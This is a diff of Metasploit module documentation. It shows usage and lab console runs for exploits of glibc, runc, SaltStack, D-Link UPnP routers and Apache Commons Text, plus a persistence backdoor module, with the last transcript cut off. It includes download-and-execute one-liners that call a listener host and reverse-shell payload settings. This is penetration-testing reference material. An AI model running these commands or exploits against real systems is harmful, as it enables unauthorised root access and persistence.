+Once booted up, edit `/etc/apt/apt.conf.d/20auto-upgrades` and change `APT::Periodic::Unattended-Upgrade` from `1` to
+`0` to ensure to ensure the machine doesn't patch itself.
+
+Ensure that glibc is at version 2.35-0ubuntu3.1 by running the following:
+```
+msfuser@msfuser-virtual-machine:~$ ldd --version
+ldd (Ubuntu GLIBC 2.35-0ubuntu3.1) 2.35
+Copyright (C) 2022 Free Software Foundation, Inc.
+This is free software; see the source for copying conditions.  There is NO
+warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+Written by Roland McGrath and Ulrich Drepper.
+```
+The target should be exploitable.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Get a session
+3. Do: `use exploit/linux/local/glibc_tunables_priv_esc`
+4. Do: `set SESSION [SESSION]`
+5. Do: `check`
+6. Do: `run`
+7. You should get a new *root* session
+
+## Scenarios
+
+### Ubuntu 22.04.3 with 2.35-0ubuntu3.1 installed (ARCH_X64)
+```
+msf6 exploit(linux/local/glibc_tunables_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/glibc_tunables_priv_esc) > set session -1
+session => -1
+msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lport 5555
+lport => 5555
+msf6 exploit(linux/local/glibc_tunables_priv_esc) > options
+
+Module options (exploit/linux/local/glibc_tunables_priv_esc):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
+   SESSION  -1               yes       The session to run this module on
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.123.1    yes       The listen address (an interface may be specified)
+   LPORT  5555             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Auto
+
+msf6 exploit(linux/local/glibc_tunables_priv_esc) > run
+
+View the full module info with the info, or info -d command.
+
+[*] Started reverse TCP handler on 192.168.123.1:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The glibc version (2.35-0ubuntu3.1) found on the target appears to be vulnerable
+[+] The Build ID for ld.so: 61ef896a699bb1c2e4e231642b2e1688b2f1a61e is in the list of supported Build IDs for the exploit.
+[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
+[*] Sending stage (3045380 bytes) to 192.168.123.228
+[*] Meterpreter session 5 opened (192.168.123.1:5555 -> 192.168.123.228:33016) at 2023-12-19 10:53:09 -0500
+
+meterpreter >getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.123.228
+OS           : Ubuntu 22.04 (Linux 6.2.0-35-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+
+```
+
+### Debian 12 with 2.36-9-deb12u1 installed (ARCH_X64)
+```
+msf6 exploit(linux/local/glibc_tunables_priv_esc) > options
+
+Module options (exploit/linux/local/glibc_tunables_priv_esc):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION  -1               yes       The session to run this module on
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.123.1    yes       The listen address (an interface may be specified)
+   LPORT  5555             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Auto
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lport 5555
+lport => 5555
+msf6 exploit(linux/local/glibc_tunables_priv_esc) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/local/glibc_tunables_priv_esc) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The glibc version (2.36-9+deb12u1) found on the target appears to be vulnerable
+[+] The Build ID for ld.so: a99db3715218b641780b04323e4ae5953d68a927 is in the list of supported Build IDs for the exploit.
+[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
+[*] Sending stage (3045380 bytes) to 192.168.123.229
+[*] Meterpreter session 3 opened (192.168.123.1:5555 -> 192.168.123.229:50370) at 2023-12-19 12:21:34 -0500
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : debian.test.com
+OS           : Debian 12.1 (Linux 6.1.0-10-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,119 @@
+## Vulnerable Application
+
+All versions of runc <=1.1.11, as used by containerization technologies such as Docker engine,
+and Kubernetes are vulnerable to an arbitrary file write.
+Due to a file descriptor leak it is possible to mount the host file system
+with the permissions of runc (typically root).
+
+Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 using Docker build.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Get an initial session
+1. Do: `use exploit/linux/local/runc_cwd_priv_esc`
+1. Do: `set session [session]`
+1. Do: `run`
+1. You should get a root shell.
+
+## Options
+
+## DOCKERIMAGE
+
+A docker image to use, docker image must have linux commands
+available (`scratch` won't work). Defaults to `alpine:latest`
+
+## FILEDESCRIPTOR
+
+The file descriptor to use, typically `7` or `8`. Defaults to `8`
+
+### runc 1.1.7-0ubuntu1~22.04.1 on Ubuntu 22.04
+
+Get an initial shell
+
+```
+user@userubuntu22:~/metasploit-framework$ ./msfconsole -qr runc.rb
+[*] Processing runc.rb for ERB directives.
+resource (runc.rb)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (runc.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (runc.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Server started.
+[*] Run the following command on the target machine:
+python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://1.1.1.1:8080/v5IbTIj', context=ssl._create_unverified_context());exec(r.read());"
+[*] 1.1.1.1   web_delivery - Delivering Payload (436 bytes)
+[*] Sending stage (24768 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.1:45198) at 2024-02-01 18:14:09 +0000
+msf6 exploit(linux/local/runc_cwd_priv_esc) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: user
+meterpreter > sysinfo
+Computer        : userubuntu22
+OS              : Linux 5.19.0-43-generic #44~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon May 22 13:39:36 UTC 2
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Priv Esc
+
+```
+resource (runc.rb)> use exploit/linux/local/runc_cwd_priv_esc
+[*] Started reverse TCP handler on 1.1.1.1:4444
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+resource (runc.rb)> set lhost 1.1.1.1
+[*] Using URL: http://1.1.1.1:8080/v5IbTIj
+lhost => 1.1.1.1
+resource (runc.rb)> set session 1
+session => 1
+resource (runc.rb)> set lport 9876
+lport => 9876
+msf6 exploit(linux/local/runc_cwd_priv_esc) > set verbose true
+verbose => true
+msf6 exploit(linux/local/runc_cwd_priv_esc) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:9876
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: python
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Vulnerable runc version 1.1.7-0ubuntu1~22.04.1 detected
+[*] Creating directory /tmp/.HdUvYm3
+[*] /tmp/.HdUvYm3 created
+[*] Uploading Payload to /tmp/.HdUvYm3/.OiGEedVKP
+[*] Uploading Dockerfile to /tmp/.HdUvYm3/Dockerfile
+[*] Building from Dockerfile to set our payload permissions
+[*] DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
+[*]             Install the buildx component to build images with BuildKit:
+[*]             https://docs.docker.com/go/buildx/
+[*]
+[*] Sending build context to Docker daemon  3.072kB
+[*] Step 1/3 : FROM alpine:latest
+[*]  ---> 05455a08881e
+[*] Step 2/3 : WORKDIR /proc/self/fd/8
+[*]  ---> Using cache
+[*]  ---> f73c936557f3
+[*] Step 3/3 : RUN cd ../../../../../../../../ && chmod -R 4777 tmp/.HdUvYm3 && chown -R root:root tmp/.HdUvYm3 && chmod u+s tmp/.HdUvYm3/.OiGEedVKP
+[*]  ---> Running in c4afc663c2bc
+[*] Removing intermediate container c4afc663c2bc
+[*]  ---> b490ec709420
+[*] Successfully built b490ec709420
+[*] Executing payload
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 1.1.1.1
+[+] Deleted /tmp/.HdUvYm3
+[*] Meterpreter session 2 opened (1.1.1.1:9876 -> 1.1.1.1:43876) at 2024-02-01 18:15:04 +0000
+[-] run: Interrupted
+msf6 exploit(linux/local/runc_cwd_priv_esc) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,126 @@
+## Vulnerable Application
+
+This exploit module uses saltstack salt to deploy a payload and run it
+on all targets which have been selected (default all).
+Currently only works against nix targets.
+
+### Vulnerable Host
+
+A vulnerable host install can be found in this [Docker environment](https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-11651/docker-compose.yml).
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Get an initial shell on the box
+1. Do: `use exploit/linux/local/saltstack_salt_minion_deployer`
+1. Do: `set session [#]`
+1. Do: `run`
+1. You should get sessions on all the targeted hosts
+
+## Options
+
+### SALT
+
+Location of salt-master executable if not in a standard location. This is added to a list of default locations
+which includes `/usr/bin/salt-master`, `/usr/local/bin/salt-master`. Defaults to ``
+
+### MINIONS
+
+Which minions to target. Defaults to `*`
+
+### WritableDir
+
+A directory on the compromised host we can write our payload to. Defaults to `/tmp`
+
+### TargetWritableDir
+
+A directory on the target hosts we can write and execute our payload to. Defaults to `/tmp`
+
+### CALCULATE
+
+This will calculate how many hosts may be exploitable by using Ansible's ping command.
+
+### ListenerTimeout
+
+How many seconds to wait after executing the payload for hosts to call back.
+If set to `0`, wait forever. Defaults to `60`
+
+## Scenarios
+
+### Minion 3002.2 on Ubuntu 20.04
+
+Get initial access to the system. In this case, root was required to execute salt commands successfully.
+
+```
+resource (salt_deploy.rb)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (salt_deploy.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (salt_deploy.rb)> set srvport 8181
+srvport => 8181
+resource (salt_deploy.rb)> set target 7
+target => 7
+resource (salt_deploy.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (salt_deploy.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1:8181/hvy2Ol
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO exVJILEV --no-check-certificate http://1.1.1.1:8181/hvy2Ol; chmod +x exVJILEV; ./exVJILEV& disown
+[*] 3.3.3.3    web_delivery - Delivering Payload (250 bytes)
+[*] Sending stage (3045380 bytes) to 3.3.3.3
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 3.3.3.3:45200) at 2023-12-16 09:59:02 -0500
+```
+
+```
+resource (salt_deploy.rb)> use exploit/linux/local/saltstack_salt_minion_deployer
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+resource (salt_deploy.rb)> set session 1
+session => 1
+resource (salt_deploy.rb)> set verbose true
+verbose => true
+resource (salt_deploy.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (salt_deploy.rb)> set lport 9996
+lport => 9996
+[msf](Jobs:1 Agents:0) exploit(linux/local/saltstack_salt_minion_deployer) > 
+
+[msf](Jobs:1 Agents:1) exploit(linux/local/saltstack_salt_minion_deployer) > run
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(linux/local/saltstack_salt_minion_deployer) > 
+[*] Started reverse TCP handler on 1.1.1.1:9996 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] /tmp is writable, and salt-master executable found
+[+] The target is vulnerable.
+[*] Attempting to list minions
+[*] minions:
+- mac_minion
+- salt-minion
+- window-salt-minion
+minions_denied: []
+minions_pre: []
+minions_rejected: []
+[+] 3.3.3.3:45200 - minion file successfully retrieved and saved to /root/.msf4/loot/20231216100004_default_3.3.3.3_saltstack_minion_890818.yaml
+[+] Minions List
+============
+
+ Status    Minion Name
+ ------    -----------
+ Accepted  mac_minion
+ Accepted  salt-minion
+ Accepted  window-salt-minion
+
+[+] 3 minions were found accepted, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.
+[*] Writing '/tmp/E76Azw' (336 bytes) ...
+[*] Copying payload to minions
+
+[*] Executing payloads
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:9996 -> 2.2.2.2:36850) at 2023-12-16 10:00:46 -0500
+```
@@ -39,7 +39,7 @@
 2. Upstart: Logs to its own file.  This module is set to restart the shell after a 10sec pause, and do this forever.
 3. systemd and systemd user: This module is set to restart the shell after a 10sec pause, and do this forever.

-**SHELLPATH**
+**BACKDOOR_PATH**
  
  If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here.  Default is /usr/local/bin

@@ -72,15 +72,15 @@ Get initial access
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

-Install our callback service (system_v w/ chkconfig).  Note we change SHELLPATH since /usr/local/bin isnt in the path for CentOS 5 services.
+Install our callback service (system_v w/ chkconfig).  Note we change BACKDOOR_PATH since /usr/local/bin isnt in the path for CentOS 5 services.

    msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
    msf exploit(service_persistence) > set session 1
    session => 1
    msf exploit(service_persistence) > set verbose true
    verbose => true
-    msf exploit(service_persistence) > set SHELLPATH /bin
-    SHELLPATH => /bin
+    msf exploit(service_persistence) > set BACKDOOR_PATH /bin
+    BACKDOOR_PATH => /bin
    msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
    payload => cmd/unix/reverse_netcat
    msf exploit(service_persistence) > set lhost 192.168.199.128
@@ -260,12 +260,12 @@ Now with a multi handler, we can catch systemd restarting the process every 10se

    Module options (exploit/linux/local/service_persistence):

-       Name        Current Setting  Required  Description
-       ----        ---------------  --------  -----------
-       SERVICE                      no        Name of service to create
-       SESSION     -1               yes       The session to run this module on.
-       SHELLPATH   /tmp             yes       Writable path to put our shell
-       SHELL_NAME                   no        Name of shell file to write
+      Name           Current Setting  Required  Description
+      ----           ---------------  --------  -----------
+      BACKDOOR_PATH  /tmp             yes       Writable path to put our shell
+      SERVICE                         no        Name of service to create
+      SESSION                         yes       The session to run this module on
+      SHELL_NAME                      no        Name of shell file to write


    Payload options (cmd/unix/reverse_netcat):
@@ -0,0 +1,267 @@
+## Vulnerable Application
+This vulnerability is based on an old theme that was discovered in 2013 by `Zach Cutlip` and explained in
+his blog [The Shadow File](https://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html).
+It is based on the infamous `UPnP` attack where a command injection vulnerability exists in multiple D-Link network products,
+allowing an attacker to inject arbitrary command to the `UPnP` via a crafted M-SEARCH packet.
+Universal Plug and Play (UPnP), by default is enabled in most D-Link devices, on the port 1900 and an attacker can perform
+a remote command execution by injecting the payload into the `Search Target` (ST) field of the SSDP M-SEARCH discover packet.
+
+## Installation
+Ideally, to test this module, you would need a vulnerable D-Link device.
+However, by downloading the firmware and install and use `FirmAE` to emulate the router,
+we can simulate the router and test the vulnerable endpoint.
+
+This module has been tested on:
+- [ ] FirmAE running on Kali Linux 2023.3
+* D-Link Router model DIR-300 revisions Ax with firmware v1.06 or older;
+* D-Link Router model DIR-300 revisions Bx with firmware v2.15 or older;
+* D-Link Router model DIR-600 revisions Bx with firmware v2.18 or older;
+* D-Link Router model DIR-645 revisions Ax with firmware v1.05 or older;
+* D-Link Router model DIR-815 revisions Bx with firmware v1.04 or older;
+* D-Link Router model DIR-816L revisions Bx with firmware v2.06 or older;
+* D-Link Router model DIR-817LW revisions Ax with firmware v1.04b01_hotfix or older;
+* D-Link Router model DIR-818LW revisions Bx with firmware v2.05b03_Beta08 or older;
+* D-Link Router model DIR-822 revisions Bx with firmware v2.03b01 or older;
+* D-Link Router model DIR-822 revisions Cx with firmware v3.12b04 or older;
+* D-Link Router model DIR-823 revisions Ax with firmware v1.00b06_Beta or older;
+* D-Link Router model DIR-845L revisions Ax with firmware v1.02b05 or older;
+* D-Link Router model DIR-860L revisions Ax with firmware v1.12b05 or older;
+* D-Link Router model DIR-859 revisions Ax with firmware v1.06b01Beta01 or older;
+* D-Link Router model DIR-860L revisions Ax with firmware v1.10b04 or older;
+* D-Link Router model DIR-860L revisions Bx with firmware v2.03b03 or older;
+* D-Link Router model DIR-865L revisions Ax with firmware v1.07b01 or older;
+* D-Link Router model DIR-868L revisions Ax with firmware v1.12b04 or older;
+* D-Link Router model DIR-868L revisions Bx with firmware v2.05b02 or older;
+* D-Link Router model DIR-869 revisions Ax with firmware v1.03b02Beta02 or older;
+* D-Link Router model DIR-880L revisions Ax with firmware v1.08b04 or older;
+* D-Link Router model DIR-890L/R revisions Ax with firmware v1.11b01_Beta01 or older;
+* D-Link Router model DIR-885L/R revisions Ax with firmware v1.12b05 or older;
+* D-Link Router model DIR-895L/R revisions Ax with firmware v1.12b10 or older;
+* probably more looking at the scale of impacted devices :-(
+
+### Installation steps to emulate the router firmware with FirmAE
+* Install `FirmAE` on your Linux distribution using the installation instructions provided [here](https://github.com/pr0v3rbs/FirmAE).
+* To emulate the specific firmware that comes with the D-Link devices, `binwalk` might need to be able to handle a sasquatch filesystem.
+* Follow installation and compilation steps that you can find [here](https://gist.github.com/thanoskoutr/4ea24a443879aa7fc04e075ceba6f689).
+* Please do not forget to run this after your `FirmAE` installation otherwise you will not be able to extract the firmware.
+* Download  the vulnerable firmware from D-Link [here](http://legacyfiles.us.dlink.com/).
+* Pick `DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP` for the demonstration.
+* Start emulation.
+* First run `./init.sh` to initialize and start the Postgress database.
+* Start a debug session  `./run.sh -d d-link /root/FirmAE/firmwares/DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP`
+* This will take a while, but in the end you should see the following...
+
+```shell
+[*] /root/FirmAE/firmwares/DIR-865L_REVA_FIRMWARE_1.07.B01.ZIP emulation start!!!
+[*] extract done!!!
+[*] get architecture done!!!
+mke2fs 1.47.0 (5-Feb-2023)
+e2fsck 1.47.0 (5-Feb-2023)
+[*] infer network start!!!
+
+[IID] 25
+[MODE] debug
+[+] Network reachable on 192.168.0.1!
+[+] Web service on 192.168.0.1
+[+] Run debug!
+Creating TAP device tap25_0...
+Set 'tap25_0' persistent and owned by uid 0
+Initializing VLAN...
+Bringing up TAP device...
+Starting emulation of firmware... 192.168.0.1 true true 60.479548271 107.007791943
+/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
+  import telnetlib
+[*] firmware - DIR600B6_FW215WWb02
+[*] IP - 192.168.0.1
+[*] connecting to netcat (192.168.0.1:31337)
+[+] netcat connected
+------------------------------
+|       FirmAE Debugger      |
+------------------------------
+1. connect to socat
+2. connect to shell
+3. tcpdump
+4. run gdbserver
+5. file transfer
+6. exit
+> 2
+Trying 192.168.0.1...
+Connected to 192.168.0.1.
+Escape character is '^]'.
+
+/ # uname -a
+Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
+/ # hostname
+dlinkrouter
+/ #
+```
+
+* You should now be able to `ping` the network address 192.168.0.1 from your host and
+* run a `nmap` command to check the services (HTTP TCP port 80 and UPNP UDP port 1900)
+
+```shell
+ # ping 192.168.0.1
+PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
+64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=8.92 ms
+64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=2.38 ms
+^C
+--- 192.168.0.1 ping statistics ---
+2 packets transmitted, 2 received, 0% packet loss, time 1001ms
+rtt min/avg/max/mdev = 2.384/5.650/8.916/3.266 ms
+ # nmap 192.168.0.1
+Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 18:33 UTC
+Nmap scan report for 192.168.0.1
+Host is up (0.022s latency).
+Not shown: 995 closed tcp ports (reset)
+PORT      STATE SERVICE
+53/tcp    open  domain
+80/tcp    open  http
+443/tcp   open  https
+8181/tcp  open  intermapper
+49152/tcp open  unknown
+MAC Address: 00:DE:FA:1A:01:00 (Unknown)
+
+Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
+ # nmap -sU 192.168.0.1
+Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-17 18:34 UTC
+Nmap scan report for 192.168.0.1
+Host is up (0.0019s latency).
+Not shown: 993 closed udp ports (port-unreach)
+PORT      STATE         SERVICE
+53/udp    open          domain
+67/udp    open|filtered dhcps
+137/udp   open|filtered netbios-ns
+1900/udp  open|filtered upnp
+5353/udp  open          zeroconf
+5355/udp  open|filtered llmnr
+19541/udp open|filtered jcp
+MAC Address: 00:DE:FA:1A:01:00 (Unknown)
+
+Nmap done: 1 IP address (1 host up) scanned in 1054.98 seconds
+```
+You are now ready to test the module using the emulated router hardware on IP address 192.168.0.1.
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/upnp/dlink_upnp_msearch_exec`
+- [x] `set rhosts <ip-target>`
+- [x] `set rport 1900`
+- [x] `set http_port 80`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=Unix Command, 1=Linux Dropper>`
+- [x] `exploit`
+
+you should get a `shell` or `Meterpreter`
+
+```shell
+msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > options
+
+Module options (exploit/linux/upnp/dlink_upnp_msearch_exec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.0.1      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      1900             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   HTTP_PORT  80               yes       Universal Plug and Play (UPnP) UDP port
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   URN        urn:device:1     no        Set URN payload
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/bind_busybox_telnetd):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   LOGIN_CMD  /bin/sh          yes       Command telnetd will execute on connect
+   LPORT      4444             yes       The listen port
+   RHOST      192.168.0.1      no        The target address
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+View the full module info with the info, or info -d command.
+```
+
+## Options
+### HTTP_PORT
+Port setting where the HTTP and SOAP service is running, typically port 80.
+This is used to discover the d-link hardware and version information by scraping the web or soap response.
+
+## Scenarios
+###  FirmAE D-Link DIR-865L Router Emulation Unix Command -  cmd/unix/bind_busybox_telnetd
+```shell
+msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > check
+
+[*] Checking if 192.168.0.1:1900 can be exploited.
+[*] 192.168.0.1:1900 - The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
+msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.0.1:1900 can be exploited.
+[+] The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
+[*] Executing Unix Command for cmd/unix/bind_busybox_telnetd
+[*] Started bind TCP handler against 192.168.0.1:4444
+[*] Command shell session 1 opened (192.168.0.2:42349 -> 192.168.0.1:4444) at 2023-10-17 18:35:36 +0000
+
+Shell Banner:
+_!_
+
+ # uname -a
+uname -a
+Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
+ # hostname
+hostname
+dlinkrouter
+ #
+```
+### FirmAE D-Link DIR-865L Router Emulation Linux Dropper -  linux/mipsle/meterpreter_reverse_tcp
+```shell
+msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set target 1
+target => 1
+msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set payload linux/mipsle/meterpreter_reverse_tcp
+payload => linux/mipsle/meterpreter_reverse_tcp
+msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > set lhost 192.168.0.2
+lhost => 192.168.0.2
+msf6 exploit(linux/upnp/dlink_upnp_msearch_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.0.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.0.1:1900 can be exploited.
+[+] The target appears to be vulnerable. Product info: DIR-865L|1.07|A1|mipsle
+[*] Executing Linux Dropper for linux/mipsle/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.0.2:8080/5W7O47FX
+[*] Command Stager progress - 100.00% done (112/112 bytes)
+[*] Client 192.168.0.1 (Wget) requested /5W7O47FX
+[*] Sending payload to 192.168.0.1 (Wget)
+[*] Meterpreter session 2 opened (192.168.0.2:4444 -> 192.168.0.1:59600) at 2023-10-17 18:45:12 +0000
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.0.1
+OS           :  (Linux 4.1.17+)
+Architecture : mips
+BuildTuple   : mipsel-linux-muslsf
+Meterpreter  : mipsle/linux
+meterpreter > getuid
+Server username: root
+meterpreter >
+```
+## Limitations
+Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads when using the Linux Dropper target.
+Some D-Link devices do not have the `wget` command so configure `echo` as cmd-stager flavor with the command `set CMDSTAGER::FLAVOR echo`.
@@ -0,0 +1,253 @@
+## Vulnerable Application
+
+This exploit takes advantage of the StringSubstitutor interpolator class,
+which is included in the Commons Text library. A default interpolator
+allows for string lookups that can lead to Remote Code Execution. This
+is due to a logic flaw that makes the “script”, “dns” and “url” lookup
+keys interpolated by default, as opposed to what it should be, according
+to the documentation of the StringLookupFactory class. Those keys allow
+an attacker to execute arbitrary code via lookups primarily using the
+"script" key.
+
+In order to exploit the vulnerabilities, the following requirements must
+be met:
+
+    Run a version of Apache Commons Text from version 1.5 to 1.9
+    Use the StringSubstitutor interpolator
+    Target should run JDK < 15
+
+## Setup
+1. `git clone https://github.com/karthikuj/cve-2022-42889-text4shell-docker`
+1. `cd cve-2022-42889-text4shell-docker`
+1. `mvn clean install`
+1. `docker build --tag=text4shell .`
+1. `docker run -p 80:8080 text4shell`
+1. Vulnerable application now running at port 8080 on docker image's ip address
+
+## Verification Steps
+1. Setup the application
+1. Start msfconsole
+1. Do: `use apache_commons_text4shell`
+1. Do: `set RHOST <docker ip>`
+1. Do: `set RPORT 8080`
+1. Do: `set TARGETURI /text4shell/attack`
+1. Do: `set PARAM search`
+1. Do: `set LHOST docker0`
+1. Do: `run`
+
+## Options
+
+### PARAM
+The parameter vulnerable to the exploit.
+
+### METHOD
+The HTTP method to use. Default: `GET`
+
+### TARGETURI
+The URI to target. Default: `/`
+
+## Scenarios
+
+### Apache Commons Text 1.8 on Alpine Linux v3.9 JDK 8
+
+Check:
+```
+msf6 > use exploit/multi/http/apache_commons_text4shell
+[*] Using configured payload java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/apache_commons_text4shell) > set lhost docker0
+lhost => 172.17.0.1
+msf6 exploit(multi/http/apache_commons_text4shell) > set rhost 172.17.0.2
+rhost => 172.17.0.2
+msf6 exploit(multi/http/apache_commons_text4shell) > set rport 8080
+rport => 8080
+msf6 exploit(multi/http/apache_commons_text4shell) > set targeturi /text4shell/attack
+targeturi => /text4shell/attack
+msf6 exploit(multi/http/apache_commons_text4shell) > set param search
+param => search
+msf6 exploit(multi/http/apache_commons_text4shell) > check
+
+[+] 172.17.0.2:8080 - The target is vulnerable. Successfully tested command injection.
+```
+
+Target: java
+```
+msf6 exploit(multi/http/apache_commons_text4shell) > set target 0
+target => 0
+msf6 exploit(multi/http/apache_commons_text4shell) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Using URL: http://172.17.0.1:8080/cuGgfHN/
+[*] Sending stage (57692 bytes) to 172.17.0.2
+[*] Meterpreter session 16 opened (172.17.0.1:4444 -> 172.17.0.2:39832) at 2023-12-23 23:03:31 +0530
+[*] Server stopped.
+
+meterpreter >
+```
+
+Target: Linux Command
+```
+msf6 exploit(multi/http/apache_commons_text4shell) > set target 3
+target => 3
+msf6 exploit(multi/http/apache_commons_text4shell) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
